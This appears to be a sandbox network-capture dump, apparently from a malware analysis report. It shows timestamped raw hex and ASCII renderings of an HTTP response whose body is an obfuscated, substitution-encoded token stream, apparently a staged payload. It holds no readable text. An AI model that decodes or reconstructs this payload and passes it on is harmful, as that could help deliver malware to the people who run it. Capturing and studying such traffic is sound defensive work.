                                                                                                2021-10-26 15:35:14 UTC6066INData Raw: 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 69 55 20 53 20 54 53 67 20 53 20 55 50 20 53 20 50 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 6e 67 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 70 50 20 53 20 6e 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 55 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 50 69 20 53 20 6e 70 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 4d 20 53 20 50 53 20 53 20 50 4d 20 53 20 54 54 70 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 50 6e 20 53 20 70 6e 20
                                                                                                Data Ascii: S TSP S UP S UU S iU S TSg S UP S PT S PM S pP S pP S UT S pP S pP S ng S PS S iO S ng S US S in S in S in S ig S TSp S pP S np S pP S pP S pP S TSp S UU S Un S TTT S Pi S np S TSg S TTP S pP S pP S pP S TMM S PS S PM S TTp S iO S pU S ng S TTp S Pn S pn
                                                                                                2021-10-26 15:35:14 UTC6068INData Raw: 20 54 54 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 69 55 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 50 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 69 20 53 20 54 54 54 20 53 20 54 4d 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 54 20 53 20 70 4f 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 55 20 53 20 4f 6e 20 53 20 6e 67 20 53 20 70 55 20 53 20 6e 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 54 53 69 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 67 20 53 20 54 4d 4d 20
                                                                                                Data Ascii: TTM S pP S pP S US S Pp S Up S iU S nn S pp S pP S pP S ng S TTP S Pn S iO S nn S pp S pP S pP S nT S TSi S TTT S TMT S TSn S pP S pP S UP S ng S TSU S nT S pO S US S in S UU S On S ng S pU S nP S UT S pP S pU S in S TSS S TSi S pn S ni S UM S TSg S TMM
                                                                                                2021-10-26 15:35:14 UTC6069INData Raw: 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 6e 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 53 70 20 53 20 54 53 69 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 54 53 50 20 53 20 55 54 20 53 20 4f 55 20 53 20 70 6e 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 54 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 70 20 53 20 70 55 20 53 20 69 6e 20 53 20 4f 4f 20 53 20 70 70 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 54 20 53 20 55 50 20 53 20 50 69 20 53 20 6e
                                                                                                Data Ascii: in S PT S UT S TSn S pn S nS S pU S TTT S TSp S TSi S Pp S pP S pP S nS S TSU S OS S TSP S UT S OU S pn S pn S pP S pU S in S TSS S pn S UT S UT S in S PT S UT S TSn S pO S US S Pn S iU S ni S pp S pU S in S OO S pp S pU S in S TSS S pn S UT S UP S Pi S n
                                                                                                2021-10-26 15:35:14 UTC6070INData Raw: 53 20 55 69 20 53 20 55 70 20 53 20 54 54 69 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 69 67 20 53 20 54 53 50 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 4d 54 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 54 54 4f 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 4f 53 20 53 20 69 67 20 53 20 6e 69 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 70 55 20 53 20 6e 67 20 53 20 69 4f 20 53 20 55 6e 20 53 20 70 50 20 53 20 54 54 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 6e 50 20 53 20 54 54 4f 20 53 20 70 50 20 53
                                                                                                Data Ascii: S Ui S Up S TTi S TTU S Pn S pP S TTO S pP S pP S UP S ig S TSP S PT S in S in S in S in S UP S US S Pp S Up S TMT S nn S nS S pP S pP S ng S TTU S TTO S TSi S TSM S OS S ig S ni S TTT S TTp S nS S pU S ng S iO S Un S pP S TTn S TSi S pU S nP S TTO S pP S
                                                                                                2021-10-26 15:35:14 UTC6072INData Raw: 69 20 53 20 54 53 4d 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 70 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 70 55 20 53 20 55 69 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 50 69 20 53 20 54 4d 54 20 53 20 50 53 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 54 20 53 20 54 53 70 20 53 20
                                                                                                Data Ascii: i S TSM S TSg S TSP S ni S TSM S TST S Ug S ni S TSM S TSM S TMT S np S pp S TTU S Pn S iO S nS S US S Pn S iO S pO S US S Pn S iO S pU S ng S TTU S nO S in S TMS S pn S ni S UM S TST S Ug S pU S Ui S TSM S TMM S in S Pi S TMT S PS S np S UM S UT S TSp S
                                                                                                2021-10-26 15:35:14 UTC6073INData Raw: 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 55 69 20 53 20 54 53 70 20 53 20 70 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 70 20 53 20 69 67 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 6e 70 20 53 20 54 4d 54 20 53 20 69 67 20 53 20 54 53 69 20 53 20 70 6e 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 6e 55 20 53 20 55 55 20 53 20 50 69 20 53 20 6e 69 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 54 54 67 20 53 20 70 70 20 53 20 55 70 20 53 20 54 53 54 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 55 4f 20 53 20
                                                                                                Data Ascii: pU S in S nS S Ui S TSp S pn S UT S pP S pn S np S ig S nS S TST S np S TMT S ig S TSi S pn S nn S TSg S pP S pP S On S TSg S nU S UU S Pi S ni S TTT S TMS S pP S pP S pn S pU S TMS S pP S TMS S TTg S pp S Up S TST S ni S TSM S TSi S pU S in S nS S UO S
                                                                                                2021-10-26 15:35:14 UTC6074INData Raw: 53 20 54 53 4d 20 53 20 54 53 70 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 50 67 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 70 70 20 53 20 69 67 20 53 20 6e 55 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 50 20 53 20 50 6e 20 53 20 54 53 70 20 53 20 54 54 55 20 53 20 55 54 20 53 20 54 53 4d 20 53 20 70 6e 20 53 20 50 53 20 53 20 6e 70 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 54 53 50 20 53 20 6e 55 20 53 20 54 53 54 20 53 20 70 70 20 53 20 55 54 20 53 20 50 50 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 54 4d 53 20 53 20 50 6e 20 53 20 6e 67 20 53 20 54 54 54 20 53 20 69 4f 20 53 20 50 69 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 70 20 53 20 50 6e 20 53 20 69 67 20 53 20 6e 4d 20 53 20 69 55 20 53 20
                                                                                                Data Ascii: S TSM S TSp S TMT S pU S TMS S TTO S UP S Pg S TSM S TSM S pp S ig S nU S ng S US S pP S Pn S TSp S TTU S UT S TSM S pn S PS S np S UM S TST S TSP S nU S TST S pp S UT S PP S TSM S TSM S TMS S Pn S ng S TTT S iO S Pi S nS S pU S TTp S Pn S ig S nM S iU S
                                                                                                2021-10-26 15:35:14 UTC6076INData Raw: 50 50 20 53 20 6e 54 20 53 20 4f 6e 20 53 20 70 55 20 53 20 54 53 4d 20 53 20 55 54 20 53 20 54 53 67 20 53 20 70 50 20 53 20 55 70 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 54 4d 53 20 53 20 54 53 53 20 53 20 55 67 20 53 20 54 53 53 20 53 20 54 53 4f 20 53 20 54 53 67 20 53 20 50 54 20 53 20 69 55 20 53 20 6e 6e 20 53 20 70 50 20 53 20 55 55 20 53 20 55 54 20 53 20 6e 69 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 6e 55 20 53 20 50 6e 20 53 20 70 55 20 53 20 70 50 20 53 20 6e 69 20 53 20 69 4f 20 53 20 6e 67 20 53 20 54 53 54 20 53 20 54 54 50 20 53 20 6e 4d 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 4f 53 20 53 20 54 54 67 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 55 54 20 53 20 70 70 20 53 20 70 50 20 53 20 69 67 20 53 20 50 54 20 53 20
                                                                                                Data Ascii: PP S nT S On S pU S TSM S UT S TSg S pP S Up S TTT S TTU S TMS S TSS S Ug S TSS S TSO S TSg S PT S iU S nn S pP S UU S UT S ni S OS S TTT S nU S Pn S pU S pP S ni S iO S ng S TST S TTP S nM S TSP S TTO S OS S TTg S pP S US S Pn S UT S pp S pP S ig S PT S
                                                                                                2021-10-26 15:35:14 UTC6077INData Raw: 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 70 20 53 20 6e 4d 20 53 20 54 53 53 20 53 20 55 69 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 54 4d 20 53 20 54 53 50 20 53 20 55 54 20 53 20 6e 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 54 67 20 53 20 70 70 20 53 20 55 70 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 55 20 53 20 69 4f 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 55 20 53 20 50 4d 20 53 20 54 54 55 20 53 20 50 4d 20 53 20 50 69 20 53 20 6e 67 20 53 20 4f 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 67 20 53 20 70 50 20 53 20 54 53 55 20 53 20 54 53 4d 20 53 20 69 6e
                                                                                                Data Ascii: S pp S UT S pP S pn S np S nM S TSS S Ui S pp S UT S pP S pn S pU S TTM S TSP S UT S nP S pP S pP S pP S pP S On S TSg S pp S TTg S pp S Up S TSM S in S iU S iO S pU S in S iU S PM S TTU S PM S Pi S ng S OU S in S in S in S Pn S TTg S pP S TSU S TSM S in
                                                                                                2021-10-26 15:35:14 UTC6078INData Raw: 20 53 20 54 54 70 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 54 70 20 53 20 54 53 4d 20 53 20 55 55 20 53 20 54 54 50 20 53 20 54 54 53 20 53 20 70 6e 20 53 20 6e 54 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 69 20 53 20 69 55 20 53 20 54 53 69 20 53 20 55 54 20 53 20 70 55 20 53 20 69 4f 20 53 20 54 54 6e 20 53 20 54 54 6e 20 53 20 54 53 4d 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 54 53 67 20 53 20 69 67 20 53 20 54 4d 53 20 53 20 55 54 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 70 70 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 6e 6e 20 53 20 55 54 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53
                                                                                                Data Ascii: S TTp S nn S nS S pP S pP S nS S TTp S TSM S UU S TTP S TTS S pn S nT S pP S pp S TTi S iU S TSi S UT S pU S iO S TTn S TTn S TSM S Up S UO S TTU S TTP S TSg S ig S TMS S UT S Up S TSU S TST S nU S UM S TSM S pp S UT S in S PT S nn S UT S in S TMS S Un S
                                                                                                2021-10-26 15:35:14 UTC6080INData Raw: 20 53 20 54 53 55 20 53 20 69 55 20 53 20 70 70 20 53 20 6e 54 20 53 20 4f 6e 20 53 20 70 55 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 70 55 20 53 20 50 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 54 20 53 20 50 4d 20 53 20 6e 6e 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 55 4f 20 53 20 50 4d 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 6e 53 20 53 20 69 55 20 53 20 69 67 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 55 4d 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 54 53 67 20 53 20 54 4d 4d 20 53 20 54 53
                                                                                                Data Ascii: S TSU S iU S pp S nT S On S pU S ng S pP S pn S nU S TSi S TSM S pU S Pn S in S in S Pn S TTT S PM S nn S TTM S pP S pP S nS S pU S TTT S UO S PM S ng S pP S pP S nP S nS S iU S ig S TSn S pP S pP S pp S UT S UM S Up S pP S pP S pp S TSO S TSg S TMM S TS
                                                                                                2021-10-26 15:35:14 UTC6081INData Raw: 20 54 53 4d 20 53 20 54 53 69 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 54 20 53 20 70 55 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 6e 6e 20 53 20 69 67 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 50 6e 20 53 20 54 53 54 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 70 20 53 20 50 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 6e 20 53 20 4f 6e 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 55 54 20 53 20 55 69 20 53 20 69 67 20 53 20 69 6e
                                                                                                Data Ascii: TSM S TSi S pn S nU S TSi S TST S pU S PP S in S in S in S TTT S nn S ig S TSM S in S in S iO S Pn S TST S TMT S OO S nU S Up S TSP S ig S TMT S pp S PP S pP S pP S pn S pP S pP S pp S Un S On S US S TTO S pp S pP S pP S pn S nU S TSi S UT S Ui S ig S in
                                                                                                2021-10-26 15:35:14 UTC6082INData Raw: 20 55 54 20 53 20 55 4f 20 53 20 50 69 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 4f 53 20 53 20 6e 6e 20 53 20 50 70 20 53 20 70 70 20 53 20 70 50 20 53 20 55 55 20 53 20 50 70 20 53 20 6e 67 20 53 20 55 54 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 6e 70 20 53 20 69 67 20 53 20 55 4f 20 53 20 6e 55 20 53 20 69 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 70 20 53 20 69 4f 20 53 20 6e 4d 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 6e 70 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 55 55 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 70 20 53 20 6e 4d 20 53 20 69 6e 20
                                                                                                Data Ascii: UT S UO S Pi S pp S TTO S UO S pP S pP S pp S OS S nn S Pp S pp S pP S UU S Pp S ng S UT S pP S nS S TST S np S ig S UO S nU S in S pp S pP S pp S iO S nM S TTU S Pn S iU S ni S pP S TSp S TTT S np S US S in S in S in S PM S UU S pP S TSS S pp S nM S in
                                                                                                2021-10-26 15:35:14 UTC6084INData Raw: 20 69 55 20 53 20 55 50 20 53 20 55 54 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 54 53 67 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 55 20 53 20 55 50 20 53 20 55 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 54 20 53 20 54 53 67 20 53 20 54 54 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 55 4f 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 55 20 53 20 55 70 20 53 20 54 53 50 20 53 20 69 67 20 53 20 54 4d 54 20 53 20 70 55 20 53 20 50 50 20 53 20 70 6e 20 53 20 54 4d 53 20 53 20 54 54 67 20 53 20 70 50 20 53 20 55 53
                                                                                                Data Ascii: iU S UP S UT S TSP S UP S UU S TSg S TSp S UP S UU S UP S UP S US S Pn S iO S pU S nT S TSg S TTi S pO S pP S pP S pP S in S PT S UP S ng S in S TMS S Un S UO S TTO S UP S pP S pP S TMT S OO S nU S Up S TSP S ig S TMT S pU S PP S pn S TMS S TTg S pP S US
                                                                                                2021-10-26 15:35:14 UTC6085INData Raw: 54 53 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 70 6e 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 4d 20 53 20 55 67 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 55 67 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 4d 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 53 50 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 4d 20 53 20 54 4d 54 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 4d 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 54 53 69 20 53 20 55 54 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 54 54 20 53 20 55 69 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 55 53 20 53 20 50 70
                                                                                                Data Ascii: TSO S ni S UM S TSM S pn S np S UM S UM S Ug S ni S UM S TSM S Ug S np S UM S UM S TSP S ni S UM S TSM S TSP S np S UM S UM S TMT S ni S UM S TSM S TMT S nU S UM S TSS S TSi S UT S On S TSg S pp S TTT S Ui S UM S pP S pP S pP S US S Pn S iO S pn S US S Pp
                                                                                                2021-10-26 15:35:14 UTC6086INData Raw: 70 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 54 4d 54 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 55 67 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 54 53 50 20 53 20 55 50 20 53 20 50 54 20 53 20 54 54 54 20 53 20 54 53 50 20 53 20 69 55 20 53 20 69 55 20 53 20 55 4f 20 53 20 4f 6e 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 55 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 55 69 20 53 20 54 53 4d 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 53 20
                                                                                                Data Ascii: p S pn S ni S UM S TSS S TSP S ni S UM S TSS S TMT S ni S UM S TSM S Ug S nU S UM S TSS S UM S UT S in S PT S UP S nn S TSP S UP S PT S TTT S TSP S iU S iU S UO S On S pP S TTO S Ug S pP S pP S pU S in S TSS S UT S TSP S ni S Ui S TSM S pU S in S nS S OS
                                                                                                2021-10-26 15:35:14 UTC6088INData Raw: 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 4f 6e 20 53 20 6e 4d 20 53 20 55 54 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 69 4f 20 53 20 55 6e 20 53 20 6e 70 20 53 20 50 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 54 54 50 20 53 20 6e 50 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 50 4d 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 6e 53 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 50 70 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 53
                                                                                                Data Ascii: T S UP S nn S On S nM S UT S UT S pP S pP S pU S in S TSS S UT S TSp S in S nS S OS S TSp S pp S UT S pP S pU S ni S TTO S iO S Un S np S PP S ng S US S TTP S nP S ng S TSU S nS S PM S ng S TTp S nS S nS S ng S TSU S nS S Pp S ng S TTp S nS S pO S ng S TS
                                                                                                2021-10-26 15:35:14 UTC6089INData Raw: 54 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 6e 69 20 53 20 50 4d 20 53 20 4f 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 6e 53 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 53 53 20 53 20 70 50 20 53 20 54 53 4f 20 53 20 6e 70 20 53 20 70 70 20 53 20 50 53 20 53 20 54 54 54 20 53 20 70 70 20 53 20 54 53 50 20 53 20 50 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 70 50 20 53 20 55 69 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 69 4f 20 53 20 55 6e 20 53 20 6e 70 20 53 20 50 50 20 53 20 6e 70 20 53 20 54 53 70 20 53 20 6e 6e 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70
                                                                                                Data Ascii: T S pP S nS S TSg S pP S pP S Pi S ni S PM S OU S pP S pP S pn S pU S TMS S pP S TMT S nS S TTO S nS S Pg S OU S TSS S pP S TSO S np S pp S PS S TTT S pp S TSP S Pp S in S in S UP S pP S Ui S ni S TTO S iO S Un S np S PP S np S TSp S nn S pO S UT S pP S p
                                                                                                2021-10-26 15:35:14 UTC6090INData Raw: 69 67 20 53 20 54 53 67 20 53 20 55 53 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 50 20 53 20 69 55 20 53 20 50 50 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 69 20 53 20 6e 69 20 53 20 54 53 70 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 53 4d 20 53 20 55 55 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 54 53 67 20 53 20 54 53 54 20 53 20 54 54 4f 20 53 20 55 4f 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 54 4d 4d 20 53 20 55 53 20 53 20 4f 55 20 53 20 55 70 20
                                                                                                Data Ascii: ig S TSg S US S nn S TSg S pP S pP S TSp S UO S UP S iU S PP S TTU S in S in S Pi S ni S TSp S TMM S in S in S Pn S TSM S UU S TSU S TTU S ni S TTO S TSg S UT S pP S Up S UO S TTU S TTP S TSg S TST S TTO S UO S pn S pP S pP S pP S UP S TMM S US S OU S Up
                                                                                                2021-10-26 15:35:14 UTC6092INData Raw: 53 20 69 4f 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 54 4f 20 53 20 69 4f 20 53 20 55 6e 20 53 20 6e 70 20 53 20 50 50 20 53 20 6e 67 20 53 20 6e 4d 20 53 20 54 54 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 55 4f 20 53 20 54 4d 4d 20 53 20 50 6e 20 53 20 54 53 70 20 53 20 54 53 55 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 53 20 53 20 54 53 53 20 53 20 69 55 20 53 20 70 6e 20 53 20 6e 67 20 53 20 54 54 50 20 53 20 70 55 20 53 20 55 70 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 6e 70 20 53 20 69 6e 20 53 20 69 4f 20 53 20 70 50 20 53 20 70 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 50 20 53 20 6e 67 20 53 20 4f 53 20 53 20 54 54 54
                                                                                                Data Ascii: S iO S Pg S OU S TTO S iO S Un S np S PP S ng S nM S TTP S ng S pP S UT S pP S pP S nS S UO S TMM S Pn S TSp S TSU S iO S pn S nS S TSS S iU S pn S ng S TTP S pU S Up S TTT S TTU S np S in S iO S pP S pO S in S PT S UP S nn S TSP S iU S UP S ng S OS S TTT
